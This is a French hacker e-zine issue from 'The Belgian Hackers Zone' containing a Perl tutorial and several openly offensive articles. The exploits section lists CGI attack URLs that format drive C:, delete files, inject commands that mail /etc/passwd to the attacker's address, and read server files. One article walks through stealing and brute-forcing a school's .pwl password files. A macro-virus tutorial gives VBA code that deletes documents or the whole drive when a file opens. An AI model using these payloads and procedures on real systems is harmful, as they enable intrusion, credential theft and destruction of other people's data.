Copy Link
Add to Bookmark
Report

The Belgian Hackers Zone Issue 07

eZine's profile picture
Published in 
The Belgian Hackers Zone
 · 21 Aug 2020

  

The Belgian Hackers Zone : http://www.thebhz.org - http://www.thebhz.com - http://www.bhz.be.tf - http://members.xoom.com/thebhz - http://thebhz.ctw.net


TTTTTTTTTTTTTTT HHH HHH EEEEEEEEEEE
TTT HHH HHH EEEEEEEEEEE
TTT HHH HHH EE
TTT HHH HHH EE
TTT HHH HHH EEEEEEEE
TTT HHHHHHHHHHHH EEEEEEEE
TTT HHH HHH EE
TTT HHH HHH EE
TTT HHH HHH EE
TTT HHH HHH EEEEEEEEEEE
TTT HHH HHH EEEEEEEEEEE


ZZZZZZZZZZZZZZZZZZZZZZZZ
BBBBBBBBBB HH HH ZZZZZZZZZZZZZZZZZZZZZ
BBB BBBBBB HH HH ZZZ
BBB BBBB HH HH ZZZZZ
BBB BBBBB HH HHH ZZZ
BBB BBBB HH HHH ZZZZ
BBB BB HH HH ZZZZ
BBB BB HH HH ZZZ
BBB BBB HH HHH ZZZZ
BBB BBBBB HH HHH ZZZZ
BBB BBBBB HH HHH ZZZZ
BBB BBBB HHHHHHHHHHHHHH ZZZZZZ
BBB BBBBB HHH HHH ZZZZZZ
BBBBBBB HHHHHHHHHHHHHHH ZZZZZZ
BBB BBBBB HHH HH ZZZ
BBB BBBB HHH HH ZZZZZ
BBB BBBBB HHH HH ZZZZZZZ
BBB BBBBB HHH HH ZZZZZZZZ
BBB BBBBB HHH HH ZZZZZZZZ
BBB BBBBBB HHH HH ZZZZZZZZZZZZZZZZZZZZZ
BBBBBBBBBBBB HHH HH ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ





_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________







bbb h h zzzzzzzzzzz 77777777777777
b bb h h z 77
b bb h h z 77
b b h h z 77
b bb h h z m m aaaa ggg 77
b bb hhhhhhh zz mm mm a a g 777777777
bbb h h zz m m m m a a g 77
b b h h z m m m a aa a g gggggg 77
b b h h z m m a a g g 77
b b h h z m m a a g g 77
bbb h h zzzzzzzzzzzz m m a a ggggg 77



_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



SOMMAIRE

>-------------------------------------|-------------------->
| ARTICLE | AUTEUR |
<-------------------------------------|-------------------->
| Introduction | Asmodeus |
1...........| Exploits | tRaSH |
2...........| Turorial sur le Perl | Asmodeus |
3...........| Voler les mots de passe de son ecole| wHyAnGeL |
4...........| Programmation de macro-virus | tRaSH |
5...........| Coupleur téléphonique | Cyriusvirus |
6...........| Buffer Overrun de MSIE | wHyAnGeL |
7...........| Telnet Décortiqué | tRaSH |
8...........| Tutorial de cracking n°3 | GRIm@ |
9...........| Hacker sa fac | CyriusVirus |
10..........| Vidage de la pile CMOS | tRaSH |
11..........| Mode d'emploi de la VMB IGLO-OLA | nada |
12..........| Les code-barres | CyriusVirus |
13..........| L'Intelink | nada |
14..........| Hack defi | tRaSH |
15..........| Securiser son systeme Linux | Asmodeus |
16..........| Les requests des scripts CGI | wHyAnGeL |
17..........| La chtite pensee anarchique n°2 | GRIm@ |
| Mot de la fin | Asmodeus |
<-------------------------------------|-------------------->


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


BHZ mag n°7, dejà. En ce debut d'annee scolaire, quand tous s'appretent à reprendre le chemin du travail, voire ont dejà repris, BHZ Mag n°7 est là. Apres avoir consacre une bonne partie de ces vacances à sa redaction (souvenez vous : BHZ mag n°6 est sorti le 14 juillet). Quel constat pouvons nous tirer en lisant ce zine ? Le BHZ est vraiment devenu un groupe, un ensemble, en regardant la partie "auteurs" du sommaire, on peut voir six noms, le groupe est compose de 11 membres, tous les autres, ceux qui n'ont pas participe à la redaction de ce zine sont quand meme restes actifs quand ils etaient chez eux. Certains peut etre un peu trop actifs (comme par exemple quand Flat Eric s'amuse à me faire courrir parce qu'il a la bonne idee de piquer un lecteur de carte à puces en pleine journee, quand GRIm@ me bat aux Echecs-VMB, quand Flat Eric essaie de phreaker les cabines Belgacom avec comme simple outil son super-couteau-qui-tue, etc...) Bon comme vous avez du le remarquer en lisant le sommaire, certains ont ecrit plus d'articles que d'autres et, comme vous le remarquerez en lisant le zine, certains articles sont (beaucoup) plus longs que d'autres. On s'en fout completement, ce qui compte c'est ce qu'il y a dedans. Voilà c'est tout. Bonne lecture.




1. Exploits by tRaSH <judasnana@caramail.com>
2. Tutorial sur le Perl by Asmodeus <asmodeus@mail.be>
3. Voler les mots de passe de son ecole by wHyAnGeL <clm_whyangel@hotmail.com>
4. Programmation de macro-virus by tRaSH <judasnana@caramail.com>
5. Coupleur telephonique by Cyriusvirus <cyriusvirus@yahoo.fr>
6. Telnet decortique by tRaSH <judasnana@caramail.com>
7. Buffer Overrun de MSIE by wHyAnGeL <clm_whyangel@hotmail.com>
8. Tutorial de cracking by Grim@ <grima@zone14.org>
9. hacker sa fac by CyriusVirus <cyriusvirus@yahoo.fr>
10. Vidage de la pile CMOS by tRaSH <judasnana@zone14.org>
11. Mode d'emploi de la VMB Igloo-Ola by nada <n_a_d_a@mail.be>
12. les codes barres by CiriusVirus <cyriusvirus@yahoo.fr>
13. L'Intelink by nada <n_a_d_a@mail.be>
14. Hack defi by tRaSH <judasnana@caramail.com>
15. Securiser son systeme Linux by Asmodeus <asmodeus@mail.be>
16. Les requests des scripts CGI by wHyAnGeL <clm_whyangel@hotmail.com>
17. La chtite pensee anarchique n°2 by GRIm@ <grima@zone14.org>
18. Le mot de la fin by Asmodeus <asmodeus@mail.be>



_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



************
* Exploits *
************

Auteur : tRaSH

-Exploit : qu’est ce qu’un exploit ? C’est une commande ou une suite de commande
qui, une fois rentrée, permettent de
chopper le root sur un serveur. Les exploits sont trouves par une personne
quelconque (toi ou moi), qui tombe dessus
soit par hasard ou en cherchant longtemps. Un des exploits des plus connus est
quote user FTP, sous FTP. Il existe des
millions d’exploits trouves ou (encore) inconnus, EN CHASSE ! ! !
Exemple d’exploit sous IIS, serveur NT
:<a target="new" href="http://www.victime.com/scripts/iisadmin/">http://www.victime.com/scripts/iisadmin/</a>
Cet exploit fonctionne comme ceci, l’URL va chercher le fichier pwd de l’admin
du serveur sous IIS. Je dis exploit,
mais on peut aussi choper le root en trouvant le fichier pwd, faisant du social
engineering, voici un chtit trucs
(attrape lame) sur lequel je suis tombe (par hazard) : Le type disait que pour
devenir admin’ sur caramail,
c’était très simple. On remplissait son formulaire (demandant pseudo et pass
caramial) et on faisait «ok »
c’est sans dire qu’ok résultait à envoyer ses infos a son e-mail (au passage,
son e-mail était <a onmouseover="window.status='Add hack_admin@caramil.com to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=hack_admin@caramil.com&nf=0">hack_admin@caramil.com</a>
pour augmenter le réalisme sans doute !)Cet exemple prouve que l’on peut trouver
des exploits de la mort en 4
commandes comme on peut trouver des pass en profitant de faille
encore plus vulnérable : les gens !
Voici une liste de bugs cgi et d’exploit décortiqué :
<a target="new" href="http://target.com/cgi-bin/perl.exe?-e?">http://target.com/cgi-bin/perl.exe?-e?</a>'format?c:'
Exploite perl pour formater le disque c : , con mais efficace
<a target="new" href="http://target.com/cgi-bin/perl.exe?-e?">http://target.com/cgi-bin/perl.exe?-e?</a>'format%20c:' Idem
<a target="new" href="http://www.target.com/cgi-bin/perl.exe?&-e">http://www.target.com/cgi-bin/perl.exe?&-e</a>+unlink+%3C*%3E La, c’est un peu
mieux, vous savez que pour avoir une URL,
on s’adresse a une boite qui associe votre IP a l’URL désirée, ok ?
Cette commande défait le lien URL=> IP, donc erreur 404 pour ceux qui tape l’URL
de la cible
Là, je vais me faire taper sur les doigts par x pass car il m’a demande
d’expliker TOUS les exploits que je mets voici
une liste d’exploit a essayer sur des serveurs, mais ca depend des logiciels que
l’admin a installé
Aglimpse, exploit a faire en telnet port 80 (il faut que la bécane aie aglimpse)
tapez ceci dans telnet (en remplaçant
<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a> par votre e-mail)
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>\
</etc/passwd;eval$CMD;echo HTTP/1.0
La commande demande au serveur d’envoyer etc\passwd (fichier password) a
<a onmouseover="window.status='Add moi@ici.beOu to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.beOu&nf=0">moi@ici.beOu</a> encore en telnet (cette fois,
il faut campas)
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
Le fichier password est édité sous telnet par cat (sous linux), on va profiter
du cat de la victime, non mais !
Il faut carbo, url a taper (en remplaçant file_a_voir par ce que vous voulez
genre passwd.pwd ou autre)
<a target="new" href="http://www.ici.be/carbo.dll?icatcommand=file_a_voir&catalogname=catalog">http://www.ici.be/carbo.dll?icatcommand=file_a_voir&catalogname=catalog</a>
Sous NT, il faut cgimail et qu’un user voie cette page :
<form action="/scripts/CGImail.exe" method="POST" NAME="TestForm">
<input type=hidden name="$File$" value="/scripts/template.txt">
<input type=hidden name="$Subject$" value="CGImail Example">
<input type=hidden name="$LocationOK$" value="/ok.html">
<input type=hidden name="$LocationKO$" value="/ko.html">
<input type=hidden name="$To$" value="<a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>">
<input type=hidden name="$Optional$" value="mmmh, no!">
La, ca envoie le fichier /scripts/template.txt à <a onmouseover="window.status='Add moi@ici.be to Your Address Book';return true;" onmouseout="window.status='';return true;" href="addressbook.cgi?un=asmodeus&uid=RIFd9icd3gT3UCAvz4tX8KgW2U&aa=create_alias&ea=moi@ici.be&nf=0">moi@ici.be</a>, bien sur on peut
remplacer template.txt par autre chose.
Dumpenv.pl, sous NT ou win 95/98 : <a target="new" href="http://www.site.net/c">http://www.site.net/c</a>:/program
files/sambar41
Cool, si le serveur a ce fichier, vous pourrez alors remonter dans
l’arborescence des fichiers (et arriver dans c : \, le rêve). On peut le refaire
dés que l’on connaît (et qu’on est
sur) de l’emplacement d’un fichier. Bon, je peux pas vous mettre plus d’exploit
car il y en a des centaines voir
des milliers, a vous de trouver.


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________





********************************
* Tutorial sur le langage Perl *
********************************

Auteur : Asmodeus

Le PERL (Practical Extraction and Report Language) est (comme l'indique son
nom), un langage d'extraction et
de rapport. On peut s'en servir pour beaucoup de choses (un scanneur de failles
CGI par exemple). Ses premieres
utilites furent, par exemple, le listing de fichiers d'un tel type dans des gros
repertoires ou l'exploration de
tres gros fichiers (des logs par exemple) à la recherche d'un mot ou d'une
expression.

C'est, à l'instar du Java, un langage interprete (ce qui signifie qu'une
compilation n'est pas obligatoire,
tant que l'on a un interpreteur pour son systeme d'exploitation (il est donc
multi-plateformes) On peut, cependant,
grace à des utilitaires comme perl2exe, creer des executables Windows pour ceux
qu ne disposent pas d'un interpreteur
ou si l'auteur ne veut pas montrer la source de son programme.

Un des autres avantages du Perl, par rapport à de plus anciens langages,
est ses possibilites au niveau
d'Internet et des reseaux. (Sans pour autant avoir besoin de tout plein de
bibliotheques...)

Le langage PERL a ete invente par Larry Wall. C'est un des lanages les plus
utilises pour la programmation
de CGI. (definition : Une interface cgi-bin est constitué d’un exécutable qui
peut être écrit dans n’importe quel
langage de programmation, capable de recevoir sur le flux d’entrée standard, ou
en arguments, les données correspondant
à une "requête" émise par le "client" via un "formulaire", d’analyser et traiter
ces données, et capable de lui donner
une réponse ou d’exécuter une action telle qu’inscription dans une base de
données, émission d’un courrier électronique,
d’un fax, mise en page dynamique d’un résultat de recherche, etc...)

A priori, n’importe quel langage de programmation pourrait convenir, du moment
que les ressources du langage permettent :

- La lecture du flux de donnée d’entrée ou la récupération de paramètres donnés
par la ligne de commande.

- L’écriture d’une réponse sur le flux standard de sortie, par défaut redirigé
vers le socket d’arrivée de l’utilisateur.

Historiquement, le développement de serveurs Internet ayant été très
fortement lié au monde Unix (ce qui est
normal d'ailleurs), les deux langages majeurs actuels servant au codage des
cgi-bin sont le C et le PERL. L’évolution
rapide des technologies réseau fait apparaître petit à petit des cgi-bin codés
en Java. Leur nombre est croissant,
mais encore largement minoritaire par rapport aux " serveurs " écrits en C ou en
Perl.

Le Perl dispose de structures de données très puissantes pour la gestion de
données sous forme de chaînes de
caractères. De plus, tout comme le shell Unix, le Perl dégage l’utilisateur des
soucis d’allocation dynamique de
mémoire, et offre une grande souplesse d’écriture de part son "typage" faible
(les variables utilisent des types
implicites qui sont analysés à l’interprétation par Perl, et qui ne demandent
pas de précautions particulière dans la
majorité des cas).

La contrepartie de cette souplesse est une certaine limitation du champ
d’action du langage. Le C dispose en
effet d’une bibliothèque bien plus large de fonctions et structures prédéfinies.
En outre la syntaxe du Perl,
récupérant de nombreuses sémantiques du shell Unix et du langage awk, rend ce
langage plus ardu à maîtriser.
(sauf pour ceux qui ont l'habitude de programmer en shell Unix (coucou Veinscuts
!!!) mais dans ce cas je suppose
qu'ils connaissent dejà un peu le langage Perl et ce tutorial ne les concerne
alors pas (ou peu)) Mais revoir les
principes de base d'un langage, ca n'a jamais fait de mal à personne !!! alors
que vous soyez debutant initie, expert,
voire totalement etranger au langage Perl, si vous lisez ceci c'est que vous
vous y interessez quand meme. Dans ce cas,
pourquoi ne pas continuer ?

Les caracteristiques du langage Perl :

Le Perl, à l’instar du langage script shell, est très libéral en matière de
types de variables. Les variables
sont automatiquement affectées à un type au moment de leur première utilisation.
En outre, le langage Perl n’impose
pas, contrairement au C, une déclaration préalable des variables.

exemple :

#!/bin/perl

$variable1 = 12 ;
$variable2 = "une chaîne" ;

Dans l'exemple précédent, la variable variable2 est automatiquement
initialisée du type "chaîne" et la variable
variable1 du type entier. Au cas où vous ne l'auriez pas remarque, le $ sert à
la declaration de variables. Quand
au #!/bin/perl , c'est pour indiquer le repertoire ou se trouve l'interpreteur
(par defaut /vin/perl).

Le Perl prend en charge dynamiquement l’allocation mémoire nécessaire aux
structures de données, qu’elles
soient scalaires ou tableaux.

Exemple :

#!/bin/perl

$tableau[2] = "12" ;

Le début de fichier précédent crée un tableau de 3 éléments et alloue
automatiquement l'espace nécessaire
pour deux éléments vides, et un non vide contenant la chaîne "12".

Si dans la suite du programme, la ligne :

$tableau[10] = 23.4e+12 ;

apparaît, le tableau est implicitement étendu en mémoire sans autre intervention
du programmeur. (à noter que la
valeur de la variable dans la 10eme case du tableau est ici une flottante)

Le Perl résout automatiquement la conversion de variables chaîne en
variables de type scalaire. Si la chaîne
ne peut être interprétée comme un nombre valide, quans on l'utilisera dans une
expression numerique (un calcul quoi)
le programmera la conversera en valeur nulle (un zero quoi)

Exemple 1 :

#!/bin/perl

$variable_num = 333 ;
$variable_txt = "222" ;
$somme = $variable_num + $variable_txt ;
print("$somme") ;

Exemple 2 :

#!/bin/perl

$variable_num = 123 ;
$variable_txt = "plif plaf plouf" ;
$somme = $variable_num + $variable_txt ;
print("$somme") ;

Dans l'exemple 1 les deux variables variable_num et variable_txt sont,la
premiere un nombre, et la deuxieme une chaîne.
Et pourtant le résultat est bien 555. La fonction print convertit la valeur
numérique 555 en chaîne "555" pour en
effectuer l'affichage.

Dans l'exemple 2, le résultat est 123, la chaîne "plif plaf plouf" valant 0
dans son interprétation numérique.

Le Perl dispose d'une caractéristique extrêmement utile, et qui lui donne
une grande partie de sa puissance.
C'est celle qui consiste à automatiquement dimensionner l'action de certaines
expressions suivant que la variable
réceptacle est une variable scalaire, ou une liste.

De nombreuses fonctions standard du Perl ont ainsi un double
fonctionnement, et permettent des opérations
globales sur des tableaux avec la même syntaxe qu'une opération sur une variable
scalaire :

#!/bin/perl

$scalaire = <STDIN> ;
@tableau = <STDIN> ;

Les deux lignes ci-dessus ont bien la même forme (lire dans STDIN). Mais
leur action est quand meme différente:

- La première vient lire une ligne du tampon STDIN et s'arrete au premier \n
qu'elle rencontre.

- La deuxième lit tout le tampon STDIN, et met chaque ligne dans une nouvelle
"case" du tableau @tableau.


Le Perl integre une notion de substitution.Cette notion est récupérée du
Korn shell Unix. Une variable peut se
substituer par sa valeur lorsqu'elle est dans une chaîne de caractères entre
double cotes.

#!/bin/perl

$variable = "Asmodeus" ;
print("qui est le plus fort ?\n $variable");

qui est le plus fort ?
Asmodeus


Types de donnees
----------------

Les 4 structures de donees majeures existant en Perl sont :

-les variables (scalaires, numériques ou caractères)
-les listes
-les tableaux
-les tableaux associatifs

Une variable scalaire contient un nombre ou une chaine de caracteres. Pour
etre declaree, son nom doit etre
precede de $ . Exemples de variables scalaires : "354", "-22", "3_567_890",
"033", "0x3E" (numeriques).
Et "je programme en Perl" (chaine de caracteres). Les chaines de caracteres
doivent etre encadress d'apostrophes ou
de guillemets ( ' ou " ).

Insertion de variables dans des fichiers :

#!/bin/perl

$variable = "
waouuuu j ecris dans un fichier" ;
open (FILE, "
>tralala" ;
print FILE ("
$variable") ;
close (FILE) ;

Ce script cree un fichier tralala (dans le meme repertoire que le script)
et ecrit dedans la variable $variable.


Une liste en Perl est une association de variables scalaires, dans un
certain ordre. Ces listes peuvent être
rangées sous forme d'une variable tableau, ou d'un tableau associatif.

Une liste peut réunir tout type de données, y compris des variables, et
dans ce cas la valeur de l'élément de
la liste prend la valeur de la variable au moment où la liste est interprétée.


La fonction des tableaux consiste à reunir des éléments dans une table
indexée. En Perl, l'absence de typage
permet de construire des tableaux contenant des valeurs numériques ou des
chaines de caractere. Un tableau est
toujours utilisé en faisant précéder son nom du @. Chaque element d'un tableau
est une variable scalaire portant
le même nom que le tableau et donc précédée de $ et suivi de l'index. Exemple :

#!/bin/perl

$variable = "
tralala" ;
@tableau = (1, 2.35, "
une chaine\n", "$variable") ;
print ("
$tableau[1]\n") ;
print ($tableau[3]) ;
}

Le resultat :

1
une chaine


Les tableaux associatifs ont la meme fonction que les tableaux normaux. La
difference c'est le mode d'indexage
du tableau. L'index utilisé dans les tableaux associatifs est une chaine de
caractère. Ils permettent donc d'associer
n'importe quelle valeur à une chaîne, par exemple la chaîne "
masculin" à la
chaîne "
sexe" dans un tableau %identite
qui définirait les caractéristiques d'une personne. L'accès à une variable
contenue dans un tableau associatif se fait
par une variable scalaire du même nom que le tableau indexées par une chaîne
contenue dans une expression {}.

#!/bin/perl

$identite{"
sexe"} = "masculin" ;
$identite{"
age"} = "69" ;
$identite{"
taille"} = 1.72 ;
foreach $membre (%identite)
{
print("
$identite{$membre}\n") ;
}

Le resultat :
masculin
69
1.72


Les operateurs
--------------

Alors dans les operateurs y'a les operateurs arithmetiques qui sont les
memes qu'en C :
- soustraction, + addition, * multiplication, / division, %modulo, **
exponentiation.
Les operateurs de comparaison :
== est egal à, =! n'est pas egal à, > est plus grand que, < est plus petit que,
>= plus grand ou egal, <= plus ptit
ou egal. Ces operateurs servent pour les valeurs numeriques. Pour les
comparaisons de chaines les operateurs sont les
suivants : eq est egal à, ne n'est pas egal, gt est plus grand que, lt est
plus ptit, ge plus grand ou egal, le
plus ptit ou egal.
Les opérateurs binaires : & et binaire, | ou binaire, ^ ou exclusif
binaire, - complément à 1, << décalage vers
la gauche, >> décalage vers la droite.
Les operateurs logiques : && et logique, || ou logique, ! negation
logique. Il y a aussi les and, or, not et
xor.
Les operateurs arythmetioques peuvent se combiner à = pour devenir un
operateur d'affectation (+= est
incrementation par exemple). (hum tout ca ressemble beaucoup au C non ?)
Les operateurs de repetition de chaines permettent de... repeter des
chaines !! exemple :

#!/bin/perl

$variable1 = "
prout " ;
$variable2 = $variable1 x 6 ;
print ("
$var2") ;

le resultat : prout prout prout prout prout prout

Les instructions
----------------

if condition {partie1} else {partie2}
Cette instruction execute la partie1 si la condition "
condition" est vraie sinon elle execute la partie2. Y'a aussi
{partie1} unless condition
Ca veut dire qu'il execute la partie & sauf si la condition est vraie.

while condition {partie1} il execute la partie 1 tant que la condition est vraie.
Pour sortir d'une boucle, on peut utiliser les instructions Last ou Next.

Les operateurs de recherche : ce sont des operateurs permettant des recherches avec plusieurs options : x : ignore les blancs ; g : cherche tous les modeles ; i : ignore la casse ; s : chaine --= une seule ligne ; m : chaine --= plusieurs lignes ; o : traite le modele une fois.

$var =~ /[tralala]/xgismo


Lire et ecrire dans les fichiers
--------------------------------

manipulation : voici les operations effectuables avec les fichiers et les repertoires : manipulation, deplacement, rennomer, lister, etc...
Les commandes :
mkdir : cree un repertoire
chdir : change de repertoire
opendir : ouvrir un rep pour le lire
readdir : lit la prochaine entree d'un repertoire
telldir : indique la position dans le repertoire
seekdir : change de position
rewinddir : revenir au debut du repertoire
closedir : fermer le repertoire
rmdir : supprimer le repertoire

Pour ouvrir un fichier on utilise la commande open()
open (FICHIER, "
tralala.txt");
et pour le fermer la commande close()
close(FICHIER);

Pour lire on utilise la fonction read()
read(FILE, $variable, Longueur, SkipOption);
$variable represente la variable où on stocke les caracteres lus. Longueur represente le nombre de caracteres.

Pour ecrire dans un fichier, on utilise les commandes print(), printf(), write() une fois celuici ouvert.
print fichier (liste_d_arguments);

Pour se deplacer dans un fichier, on utilise les commandes seek() et tell()
seek(FICHIER, $distance, 1)
distance est la valeur du deplacement (positif pour en avant et negatif pour en arriere)

Ce tutorial est à utiliser en plus des fichiers d'aides fournis avec l'interpretreur gnu qui decrivent TOUTES les commandes. Toutefois, dans un prochizn zine, j'ecrirai la suite de ce tutorial qui comprendra les commandes importantes autres que celles vues ici.


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________


*******************************************************
* Comment voler tous les mots de passe de votre ecole *
*******************************************************

Auteur : wHyAnGeL
Date : 01.08.00
Titre : Comment voler tous les mots de passe de votre école.
Avant de commencer cet article je tiens à remericer @nTraX qui m'a aidé à réaliser ce projet. Je crois que sans lui je n'y serais pas parvenu aussi vite.

Comme vous le savez certainement, toutes les école travaile sous Windows NT (IIS 4.0 la plupart du temps), je n'ai jamais vu ou entendu parler d'une école qui travailler avec Linux RedHat ou bien un autre du même type (j'ai dit RedHat car c'est le Linux grand public). Ce ne serait pas sérieux de la part d'une école élitiste (mouharf !) de travailler avec un OS en open source.

Sachez tout d'abord qu'il y a souvent quatre types d'accés :
* Ceux des élèves qui se résume souvent à internet, interdiction d'utiliser les disque amovible tel que les disquettes ou les zip.
* Les proffesseur qui peuvent faire le même que vous, plus imprimer et enregistrer des données sur un disque amovible.
* Les 'sk00l r00tz' ou plutot les admins, souvent se sont des professeur qui ne savent même pas coder, ils peuvent tout faire sauf changer de proxy et supprimer les accès des admistrateurs.
[ND Asmodeus : c'est le prototype des gens que je deteste et qui me detestent (mais pourquoi donc ?)]
* Les 'adm1n1stratorz' (ca me fais trop rire :), ils peuvent tout faire, mais ne viennent jamais sur les lieux sauf si un problème grave se pose, style hack du serveur ou coup de pied au cul du PC n°5 :).

Windows utilise deux façons de logger les codes (en fait c'est juste une encryption différente et un autre format de fichier). Il existe les *.sam et les *.pwl. Comme les écoles utilisent (presque) tout le temps le système de login en *.pwl, c'est sur ceux là que nous allons nous attarder. J'ai oublié de vous dire que pwl signifie password list.

@nTraX ayant trouvé une façon de procéder assez simple mais qui ne fonctionne pas tout le temps, j'ai en créé une autre et je vous explique les deux. La première étant plus facile mais il faut que vous pouviez avoir accès au root directory c'est à dire à la racine, où sont stocké tous les *.pwl.

===============
== Facon n°1 ==
===============

* Essayez d'avoir le mot de passe d'un copain (héhé) à vous pour démarrer votre session, ce sera plus sur. Si vous n'en avez pas trouvez, ce n'est rien utilisez le vôtre.
* Trouvez un HD vide sur le PC, normallement ca ne devrait pas être trop dur, il y en a plein.
* Passez par le poste de travail ou par l'explorateur Windows pour allez dans le dossier C:\Windows ou c:\Win NT.
* Réorganisez les icônes par type et sélectionnez tous les *.pwl.
* Faites copier (ctrl+c).
* Faites coller dans l'HD vide (ctrl+v).
* Si un quelconque progs de sécurité vous en empêche, clickez avec le boutton droit de la souris et envoyer les vers A:\, c'est à dire la disquette. Si le lame sécurity © vous en empêche toujours passez à la façon n°2.
* Après la prise de passwords le décryptage, pour ce faire utilisez un petit utilitaire nommé Cain (la version 1.51 minimum s'impose), tu peux le downloader à cette URL : http://warex.box.sk/crackers.htm.
* Installez le et éxécutez le.
* Cliquez sur l'icône à gauche nommé PWL Files (les troisièmes en partant du bas vers le haut).
* Cliquez sur le + (en au à gauche) et ajoutez vos copies.
* Crackez les. Explication : si le fichier s'appelle e2e11.pwl l'usre name sera e2e11. Prenez exemple sur votre password pour le crack, ne mettez pas les caractères spéciaux quand vous crackez par brute force.
* Si vous n'avez qu'une heure, se ne sera pas assez, laissez le cracker et apuyez sur alt+del pour le cacher. Vous reviendrez en fin de journée, pour le faire réaparaître appuyez sur alt+pgup.

===============
== Façon n°2 ==
===============

Il suffit de faire la même chose qu'à la façon n°1 à part que pour voir les *.pwl vous devez taper sous dos :
dir %systemroot\*.pwl
Normallement ceci va apparaître :
Volume in drive C has no label
Volume Serial Number is 6352-7G15
Mais avec vos informations.

Bon crack !


_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________





********************************
* Programmation de macro virus *
********************************

Auteur : tRaSH

-programmation de macro virus : une macro est un mini programme intégré dans un
document word.
Ces programmes sont écris en Visual Basic, et très simple a réaliser. Créez un
nouveau document Word, enregistrez le
et cliquez sur outils, macro, macro, ok ?
Tout d'abord, le programme doit contenir comme première ligne sub "
AutoOpen "
qui permettra de lancer le programme
automatiquement au chargement du fichier word. Comme dernière ligne, il devra
contenir "
sub viewvbcode " puis
directement "
end " a la ligne suivante, c'est pour rendre la macro invisible. La
programmation ressemble de loin à
du Q-Basic avec des commandes qui diffèrent
légèrement. Voici un exemple de programme commente (les commentaires sont
précède d'une "
' " ) :

sub autoOpen ()''macrovirus
'macro enregistree le 0/0/00 par tRaSH'
msgBox "
voici une macro " 'affiche l'avertissement "voici une macro "
kill "
c : \*. doc " 'detruit tous les fichiers doc present dans la racine
msgBox "
systeme bloque ", SystemModal + vbOKCancel " 'affiche 'l'avertissement
" systeme bloque " et 'bloque tout le
systeme tant que l'on n'a 'pas clicke sur ok ou annuler
num = int(rnd * 10) 'tire un nombre au hazard compris entre 1 et 20
msgBox num 'affiche le nombre tire au hazardendOn peut faire mieux :
Sub autoOpen ()Num = int(rnd * 10)If num = 6 then kill "c : \*. * "
Else msgBox "tu as de la chance… "End
Ce programme est une sorte de casino de la mort. Il y a des centaines de
commandes, pour en savoir plus, consulte un
bon bouquin sur le visual basic.

_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________
_______________________________________________________________________________________________
-----------------------------------------------------------------------------------------------
_______________________________________________________________________________________________



*************************
* Coupleur telephonique *
*************************

Auteur : CyriusVirus

Introduction
Vous avez toujours reve pouvoir hacker a partir de votre ordinateur et d' un
telephone cellulaire (phreaké ou non).
La plupart des vrais hackers etrangers se sont deja tourne depuis pas mal de
temps vers cette solution, qui leur permet
de ne pas se faire tracer tres facilement.
Les paires d' Esn/min ne sont plus difficiles à obtenir et si utilisées
soigneusement durent beaucoup plus longtemps
que des télécartes, des codes et la plupart des autres méthodes de sabotage de
téléphone.
Ce texte explique comment relier facilement n'importe quel téléphone cellulaire
à un modem, sans devoir acheter une
interface de ligne cellulaire ou un dispositif semblable. Ce dont vous aurez
besoin pour acomplir ce projet:

1 téléphone de bureau
1 prise téléphonique male/femelle
2 morceaux de fil (30cm chacun)
1 rouleau d' etain
1 ruban adhesif
Vous aurez besoin également d'un fer à souder,
d' une pince à dénuder et
d'un tournevis.

Instructions:
1. Ouvrez le combiné de votre téléphone. Retirez le haut-parleur et le
microphone du bâti de plastique et coupez les
fils qui y sont reliés.
2. Soudez maintenant les 30cm de fil sur les fils existants du haut-parleur et
du microphone du combiné. Une fois que
vous avez fait ceci, resoudez simplement le haut-parleur et le microphone sur le
câblage du combiné téléphonique.
3. Placez le haut-parleur du combiné téléphonique sur le microphone de votre
téléphone cellulaire et fixez le tout
par du rhuban adhesif. Ceci tient non seulement le haut-parleur du combiné
téléphonique en position, mais empêche
également des problèmes de bruit de fond.
4. Placez maintenant le microphone du combiné téléphonique au-dessus du
haut-parleur de votre téléphone cellulaire
et enveloppez de rhuban adhesif.
Comment utiliser le dispositif:
